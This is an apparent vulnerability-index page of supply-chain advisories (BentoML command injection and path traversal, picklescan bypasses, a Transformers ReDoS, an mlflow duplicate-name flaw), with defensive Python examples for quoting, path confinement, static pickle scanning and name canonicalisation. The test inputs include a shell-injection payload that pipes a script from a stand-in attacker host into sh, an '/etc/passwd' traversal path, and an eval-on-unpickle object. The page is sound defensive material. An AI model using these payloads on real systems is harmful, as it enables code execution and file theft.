Supply Chain
32 entries
Every Supply Chain entry VulnWatch has indexed, sorted by publication date.
BentoML: Command Injection in cloud deployment setup script
Commit ce53491 (March 24) fixed command injection via `system_packages` in Dockerfile templates and `images.py` by adding `shlex.quote`. However, the cloud deployment path in `src/bentoml/_internal/cl...
BentoML has Dockerfile Command Injection via system_packages in bentofile.yaml
## Summary The `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages`...
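The two BentoML entries above describe the same bug class: a `system_packages` value pasted into a Dockerfile `RUN` line without quoting, and a fix that wraps each value in `shlex.quote`. The block below is an added example, not BentoML's code: it renders the raw interpolation the advisories describe beside the quoted form, adds a package-name allowlist as a second layer (the Debian package-name rule is assumed here; BentoML's own validation, if any, is not on this page), and tokenises the resulting `RUN` line the way a POSIX shell would so the injected `;` and `|` operators are visible. The `apt-get` command shape and the payload are constructed for the example.

```python
import re
import shlex

# Debian Policy 5.6.1 package names: lowercase alphanumerics plus "+", "-", ".",
# at least two characters, starting with an alphanumeric (assumed allowlist).
PACKAGE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9+.-]+$")

# Constructed payload: a "package" that is really a shell command chain.
PAYLOAD = "curl; curl http://attacker.example/x | sh"

RUN_PREFIX = "RUN apt-get update && apt-get install -y "


def render_run_vulnerable(system_packages):
    """Pattern the advisories describe: values interpolated into RUN unquoted."""
    return RUN_PREFIX + " ".join(system_packages)


def render_run_quoted(system_packages):
    """Mitigation in the cited commit: shlex.quote each value before interpolation."""
    return RUN_PREFIX + " ".join(shlex.quote(p) for p in system_packages)


def validate_packages(system_packages):
    """Allowlist layer: reject anything that is not a plausible package name."""
    bad = [p for p in system_packages if not PACKAGE_NAME_RE.fullmatch(p)]
    if bad:
        raise ValueError(f"invalid system_packages entries: {bad}")
    return list(system_packages)


def render_run_hardened(system_packages):
    """Allowlist first, then quote: two independent layers."""
    return render_run_quoted(validate_packages(system_packages))


def run_argv(run_line):
    """Tokenise the RUN line as a POSIX shell would, keeping ; | && as operator tokens."""
    lexer = shlex.shlex(run_line[len("RUN "):], posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def is_valid_package_list(system_packages):
    """True when every entry passes the allowlist (convenience for callers)."""
    try:
        validate_packages(system_packages)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    vuln = render_run_vulnerable(["curl", PAYLOAD])
    safe = render_run_quoted(["curl", PAYLOAD])
    print(vuln)
    print(run_argv(vuln))   # ';' and '|' appear as separate operator tokens
    print(safe)
    print(run_argv(safe))   # the payload survives only as one apt-get argument
    print(is_valid_package_list(["curl", PAYLOAD]))  # allowlist rejects it outright
```

Quoting alone turns the payload into a single argument that `apt-get` will fail to find; the allowlist rejects it before any Dockerfile is rendered, which is the better place to stop it.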
picklescan missing detection by simple obfuscation of a `builtins.eval` call
### Summary An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source. ### Details It's possibl...
BentoML has a Path Traversal via Bentofile Configuration
### Summary BentoML's `bentofile.yaml` configuration allows path traversal attacks through multiple file path fields (`description`, `docker.setup_script`, `docker.dockerfile_template`, `conda.enviro...
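For the path-traversal entry, the check a build tool needs is that every user-supplied path resolves inside the build root after symlinks and `..` are collapsed. The block below is an added example, not BentoML's code; it covers the first three field names the summary lists (the fourth is truncated on this page and is left out), treats `build_root` as the directory containing `bentofile.yaml`, and exercises the check against a constructed configuration in a temporary directory, including a symlink inside the root that points outside it.

```python
import tempfile
from pathlib import Path

# Fields named in the advisory summary as taking file paths (assumed subset).
PATH_FIELDS = ("description", "docker.setup_script", "docker.dockerfile_template")


def dotted_get(config, dotted):
    """Look up 'docker.setup_script' in a nested dict; None when absent."""
    node = config
    for part in dotted.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def confine(build_root, user_path):
    """Return the absolute path for user_path, or raise if it escapes build_root.

    Path.joinpath discards the root when user_path is absolute, and resolve()
    follows symlinks, so '/etc/passwd', '../../x' and an in-root symlink that
    points outside are all caught by the same containment test.
    """
    root = Path(build_root).resolve()
    candidate = (root / user_path).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"{user_path!r} resolves outside build root: {candidate}")
    return candidate


def escapes(build_root, user_path):
    """Boolean form of confine() for callers that only want a verdict."""
    try:
        confine(build_root, user_path)
        return False
    except ValueError:
        return True


def find_traversals(build_root, config):
    """Return {field: value} for every configured path field that escapes build_root."""
    bad = {}
    for field in PATH_FIELDS:
        value = dotted_get(config, field)
        if value is not None and escapes(build_root, value):
            bad[field] = value
    return bad


def demo():
    """Constructed bentofile.yaml contents checked against a temporary build root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "bento"
        root.mkdir()
        (root / "README.md").write_text("demo\n")
        (Path(tmp) / "outside.tpl").write_text("")
        (root / "link.tpl").symlink_to(Path(tmp) / "outside.tpl")  # escapes via symlink
        config = {
            "description": "README.md",                      # fine: inside root
            "docker": {
                "setup_script": "../../../etc/passwd",      # classic dot-dot escape
                "dockerfile_template": "link.tpl",          # symlink out of the root
            },
        }
        return find_traversals(root, config)


if __name__ == "__main__":
    print(demo())
```

Comparing resolved paths rather than string prefixes matters: a prefix test on `/srv/bento` would accept `/srv/bento-evil/x`, and a check done before `resolve()` would miss the symlink case.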
Picklescan Bypass is Possible via File Extension Mismatch
### Summary Picklescan can be bypassed, allowing the detection of malicious pickle files to fail, when a standard pickle file is given a PyTorch-related file extension (e.g., .bin). This occurs becaus...
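The bypass above works because the scanner chose its parser from the file extension. The block below is an added example, not picklescan's code: it classifies a blob by content (zip magic for PyTorch-style archives, otherwise whether the bytes parse as a pickle opcode stream to `STOP`), walks `GLOBAL`/`STACK_GLOBAL` opcodes with `pickletools.genops` without ever unpickling, and reports references to a small assumed denylist of code-executing globals. The payload is constructed here with a `__reduce__` that calls `builtins.eval`; it is written under both `.bin` and `.pkl` names to show the verdict no longer depends on the extension.

```python
import io
import pickle
import pickletools
import tempfile
import zipfile
from pathlib import Path

# Assumed denylist for this example; picklescan maintains its own list.
DANGEROUS = {("builtins", "eval"), ("builtins", "exec"), ("os", "system"),
             ("subprocess", "Popen"), ("subprocess", "check_output")}
ZIP_MAGIC = b"PK\x03\x04"
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
# Protocol < 3 writes the Python 2 module name for builtins.
MODULE_ALIASES = {"__builtin__": "builtins"}


def looks_like_pickle(data):
    """Content sniffing: a stream that parses cleanly and ends in STOP is a pickle."""
    try:
        last = None
        for op, _arg, _pos in pickletools.genops(data):
            last = op.name
        return last == "STOP"
    except Exception:
        return False


def referenced_globals(data):
    """Collect (module, name) pairs from GLOBAL and STACK_GLOBAL opcodes.

    STACK_GLOBAL takes module and name from the two preceding string pushes; this
    tracker reads those literally and does not follow memo references, which is
    the kind of gap an opcode-level scanner has compared with a real unpickler.
    """
    found, strings = set(), []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)          # pickletools renders "mod name"
            found.add((MODULE_ALIASES.get(module, module), name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            module, name = strings[-2], strings[-1]
            found.add((MODULE_ALIASES.get(module, module), name))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found


def scan_bytes(data):
    """Dangerous globals in a raw pickle or in every pickle member of a zip archive."""
    if data.startswith(ZIP_MAGIC):
        hits = set()
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                blob = zf.read(member)
                if looks_like_pickle(blob):
                    hits |= referenced_globals(blob) & DANGEROUS
        return hits
    if looks_like_pickle(data):
        return referenced_globals(data) & DANGEROUS
    return set()


def scan_file(path):
    with open(path, "rb") as f:
        return scan_bytes(f.read())


class EvalOnLoad:
    """Constructed payload: unpickling calls builtins.eval("1+1")."""
    def __reduce__(self):
        return (eval, ("1+1",))


def constructed_payload(protocol):
    return pickle.dumps(EvalOnLoad(), protocol=protocol)


def constructed_archive(protocol):
    """Zip with a pickle member, the layout torch-style archives use."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/data.pkl", constructed_payload(protocol))
    return buf.getvalue()


def demo():
    """Same raw pickle under two extensions: verdict must not change."""
    with tempfile.TemporaryDirectory() as tmp:
        results = {}
        for name in ("weights.bin", "weights.pkl"):
            Path(tmp, name).write_bytes(constructed_payload(4))
            results[name] = scan_file(Path(tmp, name))
        return results


if __name__ == "__main__":
    print(demo())
    print(scan_bytes(constructed_archive(4)))
```

Nothing here calls `pickle.loads`; the scan is purely static, which is also why it should be treated as a filter and not as proof of safety.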
Transformers vulnerable to ReDoS attack through its get_imports() function
A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the `get_imports()` function within `dynamic_module_utils.py`. Thi...
Undefined Behavior in mlflow
A vulnerability in mlflow/mlflow version 2.11.1 allows attackers to create multiple models with the same name by exploiting URL encoding. This flaw can lead to Denial of Service (DoS) as an authentica...
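The mlflow entry describes two spellings of one name passing a uniqueness check. The block below is an added example, not mlflow's code: it decodes percent-encoding until the value stops changing (so single- and double-encoded variants land on the same key), applies Unicode NFC normalisation, and uses that canonical form as the registry key while keeping the name as the user typed it. The in-memory registry is constructed for the example.

```python
import unicodedata
from urllib.parse import unquote


def canonical_model_name(name, max_rounds=5):
    """Canonical key for a model name: fully percent-decoded, NFC, trimmed."""
    current = name
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    else:
        raise ValueError(f"{name!r} is percent-encoded more than {max_rounds} layers deep")
    key = unicodedata.normalize("NFC", current).strip()
    if not key:
        raise ValueError("model name is empty after canonicalisation")
    return key


class ModelRegistry:
    """Constructed registry: uniqueness is enforced on the canonical key."""

    def __init__(self):
        self._models = {}  # canonical key -> name as originally submitted

    def create(self, name):
        key = canonical_model_name(name)
        if key in self._models:
            raise ValueError(f"{name!r} already exists as {self._models[key]!r}")
        self._models[key] = name
        return key

    def names(self):
        return list(self._models.values())


def register_all(names):
    """Return (accepted, rejected) after submitting names in order to a fresh registry."""
    registry, accepted, rejected = ModelRegistry(), [], []
    for name in names:
        try:
            registry.create(name)
            accepted.append(name)
        except ValueError:
            rejected.append(name)
    return accepted, rejected


if __name__ == "__main__":
    print(register_all(["my model", "my%20model", "my%2520model", "other"]))
```

Canonicalising once at the boundary and keying every lookup on the result is what keeps the check consistent; decoding in one code path and not another is how the duplicate gets in.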